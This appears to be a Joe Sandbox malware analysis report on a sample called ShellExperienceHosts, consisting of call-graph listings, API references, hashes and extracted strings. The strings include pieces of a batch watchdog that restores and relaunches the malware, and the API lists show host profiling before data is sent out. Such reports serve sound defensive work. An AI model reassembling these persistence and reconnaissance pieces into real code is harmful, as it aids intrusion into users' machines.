128066->128067 128068 6c7416a1 128067->128068 128069 6c6e1e5c 73 API calls 128068->128069 128070 6c7416ae CreatePen 128069->128070 128071 6c6e1e06 72 API calls 128070->128071 128177->128006 128178->128016 128180 6c6e2c9c __EH_prolog3 128179->128180 128181 6c6e2cbf GetWindowDC 128180->128181 128220 6c6e1ff3 128181->128220 128185 6c6e2cd5 Concurrency::details::ExternalContextBase::~ExternalContextBase 128185->128023 128188 6c6e1e65 128187->128188 128189 6c6e1e62 128187->128189 128258 6c6e1e32 128188->128258 128189->128034 128191 6c6e1e6a DeleteObject 128191->128034 128193 6c6e1e13 128192->128193 128197 6c6e1e28 128192->128197 128194 6c6e2e58 72 API calls 128193->128194 128195 6c6e1e1d 128194->128195 128196 6c7a06ff RaiseException 128195->128196 128196->128197 128197->128037 128221 6c6e2000 128220->128221 128225 6c6e2016 128220->128225 128227 6c6e2de7 128221->128227 128223 6c6e200b 128235 6c7a06ff 128223->128235 128225->128185 128226 6c6e178d RaiseException CallUnexpected 128225->128226 128228 6c6e2df3 __EH_prolog3 128227->128228 128239 6c75c8ec 128228->128239 128230 6c6e2df8 Concurrency::details::ExternalContextBase::~ExternalContextBase 128231 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128230->128231 128234 6c6e2e3e Concurrency::details::ExternalContextBase::~ExternalContextBase 128230->128234 128232 6c6e2e19 128231->128232 128232->128234 128246 6c7a0f88 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 ~refcount_ptr 128232->128246 128234->128223 128237 6c7a0719 Concurrency::details::ExternalContextBase::~ExternalContextBase 128235->128237 128236 6c7a0737 128236->128225 128237->128236 128248 6c7a0884 128237->128248 128240 6c75c8b9 Concurrency::details::ExternalContextBase::~ExternalContextBase 72 API calls 128239->128240 128241 6c75c8f1 128240->128241 128242 6c7a170b Concurrency::details::ExternalContextBase::~ExternalContextBase 66 API calls 128241->128242 128243 6c75c8fe 
128242->128243 128243->128230 128247 6c84c646 RaiseException 128243->128247 128245 6c75e7f5 128246->128234 128247->128245 128249 6c7a089b 128248->128249 128250 6c7a088d 128248->128250 128249->128236 128252 6c7616c4 128250->128252 128253 6c7616ce 128252->128253 128254 6c7616d4 Concurrency::details::ExternalContextBase::~ExternalContextBase 128253->128254 128257 6c75e7dc RaiseException CallUnexpected 128253->128257 128254->128249 128259 6c6e1e3d 128258->128259 128260 6c6e1e44 128258->128260 128262 6c6e2e58 128259->128262 128260->128191 128263 6c6e2e64 __EH_prolog3 128262->128263 128264 6c75c8ec Concurrency::details::ExternalContextBase::~ExternalContextBase 72 API calls 128263->128264 128265 6c6e2e69 Concurrency::details::ExternalContextBase::~ExternalContextBase 128264->128265 128266 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128265->128266 128269 6c6e2eaf Concurrency::details::ExternalContextBase::~ExternalContextBase 128265->128269 128267 6c6e2e8a 128266->128267 128267->128269 128270 6c7a0f88 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 ~refcount_ptr 128267->128270 128269->128260 128270->128269 128340 6c6d82f4 128352 6c6d6a5d 17 API calls 128340->128352 128343 6c6d82fa 128347 6c6d7234 128343->128347 128353 6c6d76c2 40 API calls 128343->128353 128345 6c6d830f Sleep 128346 6c6d82eb 128345->128346 128346->128340 128354 6c85b987 128347->128354 128349 6c6d7244 128351 6c6d76ba 128349->128351 128362 6c85b9d7 14 API calls 2 library calls 128349->128362 128351->128343 128352->128343 128353->128345 128355 6c85b993 ___scrt_is_nonwritable_in_current_image 128354->128355 128363 6c85c939 EnterCriticalSection 128355->128363 128357 6c85b99a 128364 6c85bc45 128357->128364 128361 6c85b9b9 128361->128349 128362->128349 128363->128357 128365 6c85bc63 128364->128365 128367 6c85bc72 128365->128367 128379 6c86a286 CreateFileW ___initconin 128365->128379 128390 6c7a11c4 5 API calls 
129446 6c74027c 129364->129446 129371 6c6e400e __EH_prolog3_GS 129370->129371 129416 6c75ccad 129371->129416 129373 6c6e4024 129374 6c6e4039 129373->129374 129422 6c85d2d7 29 API calls 3 library calls 129373->129422 129376 6c75c8b9 Concurrency::details::ExternalContextBase::~ExternalContextBase 72 API calls 129374->129376 129377 6c6e4046 129376->129377 129378 6c6e4159 129377->129378 129380 6c7a170b Concurrency::details::ExternalContextBase::~ExternalContextBase 66 API calls 129377->129380 129423 6c75e7dc RaiseException CallUnexpected 129378->129423 129382 6c6e405d 129380->129382 129382->129378 129383 6c6e4065 GetCurrentThread GetCurrentThreadId GetVersionExW 129382->129383 129384 6c6e411c 129383->129384 129385 6c7a12be 5 API calls 129384->129385 129386 6c6e4156 129385->129386 129387 6c6b1f44 129386->129387 129388 6c6b1f7f 129387->129388 129389 6c6b1f83 129388->129389 129433 6c6b287a 40 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129388->129433 129392 6c737608 129389->129392 129391 6c6b1fb6 129393 6c737614 __EH_prolog3 129392->129393 129394 6c73761f Concurrency::details::ExternalContextBase::~ExternalContextBase 129393->129394 129395 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129393->129395 129394->129359 129396 6c73762b 129395->129396 129396->129394 129434 6c7e171c 129396->129434 129399 6c6dfb33 129398->129399 129400 6c6dfb8a 129399->129400 129401 6c6dfb37 129399->129401 129443 6c6b287a 40 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129400->129443 129404 6c6dfb67 129401->129404 129405 6c6dfb55 129401->129405 129403 6c6dfb9b 129403->129361 129442 6c6b44da 68 API calls 129404->129442 129441 6c6b1fca 104 API calls 129405->129441 129407 6c6dfb65 129407->129361 129410 6c6e35d2 129409->129410 129411 6c6e35bf 129409->129411 129410->129363 129412 6c6e35e4 129411->129412 129413 6c6e35cb 129411->129413 129445 6c6b45a0 68 API calls 5 library calls 129412->129445 129444 
6c6e3688 68 API calls 129413->129444 129417 6c75ccb9 __EH_prolog3 129416->129417 129418 6c75fac2 72 API calls 129417->129418 129419 6c75ccc3 129418->129419 129424 6c75d0ae 129419->129424 129421 6c75ccdb Concurrency::details::ExternalContextBase::~ExternalContextBase 129421->129373 129422->129374 129427 6c75c98e 129424->129427 129426 6c75d0c5 GetCursorPos 129426->129421 129428 6c7a170b Concurrency::details::ExternalContextBase::~ExternalContextBase 66 API calls 129427->129428 129429 6c75c99d 129428->129429 129429->129426 129432 6c84c646 RaiseException 129429->129432 129431 6c75e7f5 129432->129431 129433->129391 129435 6c7e172e SHGetMalloc 129434->129435 129436 6c7e174a 129434->129436 129435->129436 129437 6c7e1746 129435->129437 129440 6c75e7dc RaiseException CallUnexpected 129436->129440 129437->129394 129441->129407 129442->129407 129443->129403 129444->129410 129445->129410 129447 6c740288 __EH_prolog3 129446->129447 129448 6c75fac2 72 API calls 129447->129448 129449 6c740292 129448->129449 129452 6c740793 129449->129452 129453 6c75c8b9 Concurrency::details::ExternalContextBase::~ExternalContextBase 72 API calls 129452->129453 129454 6c7407d5 129453->129454 129455 6c80e632 Concurrency::details::ExternalContextBase::~ExternalContextBase 6 API calls 129454->129455 129456 6c7407de 129455->129456 129457 6c7a12dc RaiseException 129456->129457 129458 6c7407e7 129457->129458 129459 6c80e6a6 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 129458->129459 129461 6c6d029e 129463 6c6d02b3 std::ios_base::_Ios_base_dtor _Yarn 129461->129463 129462 6c85c237 29 API calls 129464 6c6d0a88 129462->129464 129465 6c6d0429 WinExec Sleep 129463->129465 129477 6c6d047f std::ios_base::_Ios_base_dtor 129463->129477 129466 6c6b9714 30 API calls 129464->129466 129467 6c6d0446 DeleteFileA 129465->129467 129468 6c6d0a94 129466->129468 129471 6c6d0466 DeleteFileA 129467->129471 129470 6c6b9714 30 API calls 129468->129470 129472 6c6d0aa0 129470->129472 129471->129477 
129474 6c6b9714 30 API calls 129472->129474 129475 6c6d0aac 129474->129475 129476 6c6b9714 30 API calls 129475->129476 129478 6c6d0ab8 129476->129478 129477->129462 129490 6c6d0873 std::ios_base::_Ios_base_dtor 129477->129490 129479 6c6b9714 30 API calls 129478->129479 129480 6c6d0ac4 129479->129480 129481 6c6b9714 30 API calls 129480->129481 129482 6c6d0ad0 129481->129482 129483 6c6b9714 30 API calls 129482->129483 129484 6c6d0adc 129483->129484 129485 6c6b9714 30 API calls 129484->129485 129486 6c6d0ae8 129485->129486 129487 6c6b9714 30 API calls 129486->129487 129488 6c6d0af4 129487->129488 129489 6c6b9714 30 API calls 129488->129489 129491 6c6d0b00 129489->129491 129492 6c6b9714 30 API calls 129491->129492 129493 6c6d0b0c 129492->129493 129494 6c6b9714 30 API calls 129493->129494 129495 6c6d0b18 129494->129495 129496 6c6b9714 30 API calls 129495->129496 129497 6c6d0b24 129496->129497 129498 6c6b9714 30 API calls 129497->129498 129499 6c6d0b30 129498->129499 129500 6c6b9714 30 API calls 129499->129500 129501 6c6d0b3c 129500->129501 129502 6c6b9714 30 API calls 129501->129502 129503 6c6d0b48 129502->129503 129504 6c6b9714 30 API calls 129503->129504 129505 6c6d0b54 129504->129505 129506 6c6b9714 30 API calls 129505->129506 129507 6c6d0b60 129506->129507 129508 6c6b9714 30 API calls 129507->129508 129509 6c6d0b6c 129508->129509 129510 6c6b9714 30 API calls 129509->129510 129511 6c6d0b78 129510->129511 129512 6c6b9714 30 API calls 129511->129512 129513 6c6d0b84 129512->129513 129514 6c6cd618 129515 6c6cd65f 129514->129515 129516 6c6c2098 98 API calls 129515->129516 129517 6c6cd671 129516->129517 129518 6c6cd6ad 129517->129518 129524 6c6cd6e4 129517->129524 129529 6c6bc810 72 API calls std::ios_base::_Ios_base_dtor 129518->129529 129521 6c6cd6b4 129522 6c6cd6a6 129528 6c6bc394 72 API calls 129522->129528 129525 6c6cd720 129524->129525 129526 6c6cd756 129525->129526 129530 6c6becb6 129525->129530 129526->129522 129528->129518 129529->129521 129531 6c6bece1 _Yarn 
129530->129531 129532 6c86009d 69 API calls 129531->129532 129533 6c6bf18f 129531->129533 129532->129531 129533->129526 129534 10004274 129535 1001f814 CreateThread 129534->129535 129537 10006110 129535->129537 129537->129537 129538 1001f63d send 129539 6c6bae95 129543 6c6baea3 std::ios_base::_Ios_base_dtor _strlen 129539->129543 129540 6c6bbd90 129541 6c85c237 29 API calls 129540->129541 129544 6c6bbd95 129541->129544 129542 6c6bbda9 129545 6c6b9714 30 API calls 129542->129545 129543->129540 129543->129542 129548 6c6bb00d 129543->129548 129549 6c6bb002 129543->129549 129559 6c6bafb4 _Yarn 129543->129559 129546 6c6b9714 30 API calls 129544->129546 129547 6c6bbdb8 129545->129547 129551 6c6bbd9a 129546->129551 129552 6c6b9714 30 API calls 129547->129552 129550 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129548->129550 129647 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129549->129647 129550->129559 129554 6c6b9714 30 API calls 129551->129554 129555 6c6bbdc7 129552->129555 129554->129542 129556 6c6b9714 30 API calls 129555->129556 129558 6c6bbdd6 129556->129558 129557 6c6bbe0d 129561 6c6b9714 30 API calls 129557->129561 129562 6c6b9714 30 API calls 129558->129562 129559->129557 129560 6c6bb08d 129559->129560 129569 6c6bbc9d 129559->129569 129579 6c6bb09d std::ios_base::_Ios_base_dtor _Yarn 129559->129579 129648 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129560->129648 129564 6c6bbe1c 129561->129564 129565 6c6bbddb 129562->129565 129567 6c6b9714 30 API calls 129564->129567 129566 6c6b9714 30 API calls 129565->129566 129568 6c6bbde0 129566->129568 129570 6c6bbe2b 129567->129570 129571 6c6b9714 30 API calls 129568->129571 129572 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129569->129572 129574 6c6b9714 30 API calls 129570->129574 129575 6c6bbdef 129571->129575 129572->129579 129573 6c6bb20a CopyFileA 129585 
6c6bb218 _strlen 129573->129585 129576 6c6bbe3a 129574->129576 129577 6c6b9714 30 API calls 129575->129577 129578 6c6b9714 30 API calls 129576->129578 129580 6c6bbdfe 129577->129580 129581 6c6bbe49 129578->129581 129579->129540 129579->129573 129583 6c6b9714 30 API calls 129580->129583 129582 6c6b9714 30 API calls 129581->129582 129584 6c6bbe58 129582->129584 129583->129557 129586 6c6b9714 30 API calls 129584->129586 129585->129547 129587 6c6bb2e8 129585->129587 129588 6c6bb2dd 129585->129588 129594 6c6bb286 _Yarn 129585->129594 129589 6c6bbe67 129586->129589 129591 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129587->129591 129649 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129588->129649 129592 6c6bc08c 29 API calls 129589->129592 129591->129594 129593 6c6bbe82 129592->129593 129594->129564 129595 6c6bb34c 129594->129595 129597 6c6bbd18 129594->129597 129600 6c6bb358 std::ios_base::_Ios_base_dtor _Yarn 129594->129600 129650 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129595->129650 129598 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129597->129598 129598->129600 129599 6c6bb4ef CopyFileA 129601 6c6bb4fd _strlen 129599->129601 129600->129540 129600->129599 129601->129555 129602 6c6bb5f8 129601->129602 129603 6c6bb5ed 129601->129603 129607 6c6bb59f _Yarn 129601->129607 129605 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129602->129605 129651 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129603->129651 129605->129607 129606 6c6bb676 129652 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129606->129652 129607->129570 129607->129606 129609 6c6bbcc3 129607->129609 129612 6c6bb686 std::ios_base::_Ios_base_dtor _Yarn 129607->129612 129611 6c6e1139 
Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129609->129611 129610 6c6c4700 98 API calls 129616 6c6bb7f9 std::ios_base::_Ios_base_dtor 129610->129616 129611->129612 129612->129540 129612->129610 129613 6c6bb888 CreateProcessA 129615 6c6bbbd6 129613->129615 129621 6c6bb8cc _strlen 129613->129621 129661 6c6bc894 72 API calls std::ios_base::_Ios_base_dtor 129615->129661 129616->129540 129616->129613 129653 6c6c4a00 17 API calls 129616->129653 129617 6c6bb868 129654 6c6bc572 72 API calls 129617->129654 129620 6c6bb870 129620->129613 129622 6c6bb877 129620->129622 129621->129568 129626 6c6bb950 129621->129626 129627 6c6bb945 129621->129627 129634 6c6bb8f7 _Yarn 129621->129634 129655 6c6ba07c OpenProcess CloseHandle 129622->129655 129625 6c6bbbde std::ios_base::_Ios_base_dtor 129625->129540 129632 6c6bbc55 std::ios_base::_Ios_base_dtor 129625->129632 129628 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129626->129628 129656 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129627->129656 129628->129634 129629 6c6bbc71 129630 6c6bb87d 129630->129613 129630->129615 129662 6c6bc810 72 API calls std::ios_base::_Ios_base_dtor 129632->129662 129633 6c6bb9ce 129657 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129633->129657 129634->129584 129634->129633 129636 6c6bbd3e 129634->129636 129642 6c6bb9de std::ios_base::_Ios_base_dtor _Yarn 129634->129642 129638 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129636->129638 129637 6c6c2098 98 API calls 129639 6c6bbb4d 129637->129639 129638->129642 129639->129540 129640 6c6bbb74 std::ios_base::_Ios_base_dtor 129639->129640 129641 6c6bbbb5 CloseHandle CloseHandle 129639->129641 129640->129639 129658 6c6bc656 17 API calls 129640->129658 129660 6c6bc810 72 API calls std::ios_base::_Ios_base_dtor 129641->129660 129642->129540 129642->129637 129645 6c6bbbaa 
129659 6c6bc394 72 API calls 129645->129659 129647->129559 129648->129579 129649->129594 129650->129600 129651->129607 129652->129612 129653->129617 129654->129620 129655->129630 129656->129634 129657->129642 129658->129645 129659->129641 129660->129615 129661->129625 129662->129629

Control-flow Graph

• Executed
• Not Executed
Control-flow graph for function 3325430-3325a2e: basic-block edge listing (graph data rendered as an image in the original report; the API calls made from these blocks are enumerated under APIs below).
APIs
• Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
• _memset.LIBCMT ref: 0332546C
• _memset.LIBCMT ref: 03325485
• _memset.LIBCMT ref: 03325495
• gethostname.WS2_32(?,00000032), ref: 033254A3
• gethostbyname.WS2_32(?), ref: 033254AD
• inet_ntoa.WS2_32 ref: 033254C5
• _strcat_s.LIBCMT ref: 033254D8
• _strcat_s.LIBCMT ref: 033254F1
• inet_ntoa.WS2_32 ref: 0332551A
• _strcat_s.LIBCMT ref: 0332552D
• _strcat_s.LIBCMT ref: 03325546
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03325573
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03325587
• GetLastInputInfo.USER32(?), ref: 0332559A
• GetTickCount.KERNEL32 ref: 033255A0
• wsprintfW.USER32 ref: 033255D5
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 033255E8
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 033255FC
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03325653
• wsprintfW.USER32 ref: 0332566C
• GetForegroundWindow.USER32 ref: 03325695
• GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 033256AC
• lstrlenW.KERNEL32(000008CC), ref: 033256D3
• lstrlenW.KERNEL32(00000994), ref: 03325739
• GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 033257AA
• GetProcAddress.KERNEL32(00000000), ref: 033257B1
• GetNativeSystemInfo.KERNEL32(?), ref: 033257C2
• GetSystemInfo.KERNEL32(?), ref: 033257CD
• wsprintfW.USER32 ref: 03325806
• GetCurrentProcessId.KERNEL32 ref: 03325818
• OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0332582E
• K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0332584B
• CloseHandle.KERNEL32(03345164), ref: 0332587F
• GetTickCount.KERNEL32 ref: 033258E9
• __time64.LIBCMT ref: 033258F8
• __localtime64.LIBCMT ref: 0332592F
• wsprintfW.USER32 ref: 03325968
• GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0332597D
• GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0332598C
• GetCurrentHwProfileW.ADVAPI32(?), ref: 03325999
• Part of subcall function 033280F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03328132
• Part of subcall function 033280F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03328166
• Part of subcall function 033280F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03328176
• Part of subcall function 033280F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033281A6
• Part of subcall function 033280F0: lstrlenW.KERNEL32(?), ref: 033281B7
• Part of subcall function 033280F0: __wcsnicmp.LIBCMT ref: 033281CE
• Part of subcall function 033280F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03328204
Strings
Memory Dump Source
• Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
Similarity
• API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
• String ID: %d min$1.0$2024.11.26$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
• API String ID: 1101047656-915692967
• Opcode ID: a248940dcd263fc247aaa6edb31c06358b4c3f2e0eb9c7f3bf364f9254225bbd
• Instruction ID: d6531414becaa3aecc44a1a1e55149b7a1d3324c019e0e407e1133dfe84c8a16
• Opcode Fuzzy Hash: a248940dcd263fc247aaa6edb31c06358b4c3f2e0eb9c7f3bf364f9254225bbd
• Instruction Fuzzy Hash: 48F181B5A40314AFE724EB64CCC5FABB7B8AF45700F008558F61AA7281EB70BA44CF55
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: _strlen
• String ID: .batkup.$.battor.$ copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.bat$.batitor$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($itor$set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
• API String ID: 4218353326-3990156688
• Opcode ID: 293d41a6966df1380ba3188c7b215007540ee3e9c66ff4c366e1a7a8e83b086c
• Instruction ID: 59cd1b6e0e83201055e6b17d53d43f2b830cc1f2f78d492020f453125bee678d
• Opcode Fuzzy Hash: 293d41a6966df1380ba3188c7b215007540ee3e9c66ff4c366e1a7a8e83b086c
• Instruction Fuzzy Hash: 2DB2BFB1A00B009BD324CF38C8D4BA6B7E5BF89308F144A2DD4A797B91EB31F5558B59
APIs
• GetNativeSystemInfo.KERNEL32(?), ref: 022304AE
• VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 022304DE
Strings
Memory Dump Source
• Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
Similarity
• API ID: AllocInfoNativeSystemVirtual
• String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
• API String ID: 2032221330-2899676511
• Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
• Instruction ID: 9c4aa92bbfb6651813ab6dcf3dc313f7f3355b04c5e72397f80aec3c880def4b
• Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
• Instruction Fuzzy Hash: 9B629CB25183868FD731CF64C840BABBBE4FF94704F04482EE5C99B255E7749A48CB66
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .batkup.$.battor.$ copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.batitor$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                                                            • API String ID: 0-143597532
                                                                            • Opcode ID: bba8782362a19a64904c06477d3f483a4914a0bc7d04870677456d05740626eb
                                                                            • Instruction ID: edb06663f8e58f0f383c621ff285266854a592ffdc4b19dc64370dcb83b21bcc
                                                                            • Opcode Fuzzy Hash: bba8782362a19a64904c06477d3f483a4914a0bc7d04870677456d05740626eb
                                                                            • Instruction Fuzzy Hash: B4F2AEB1A00B009BD325CF38C8C4AA7B7E5FF99308F148A2DD49A97B41E731F5598B59
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .batkup.$.battor.$ copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.batitor$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                                                            • API String ID: 0-143597532
                                                                            • Opcode ID: 47cedaf6762367846ce843261faeb5c6a20e1139c6c2ec1eacf5ce0154ff6411
                                                                            • Instruction ID: 50fb48fcd471eb17fd3f962d020ce01f7899f12a48e9808d5703cfa69da39474
                                                                            • Opcode Fuzzy Hash: 47cedaf6762367846ce843261faeb5c6a20e1139c6c2ec1eacf5ce0154ff6411
                                                                            • Instruction Fuzzy Hash: 8EC2BEB1A00B009BD324CF38C8D4BA6B7E5BF89308F144A2DD4A797B91E731F5598B59

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
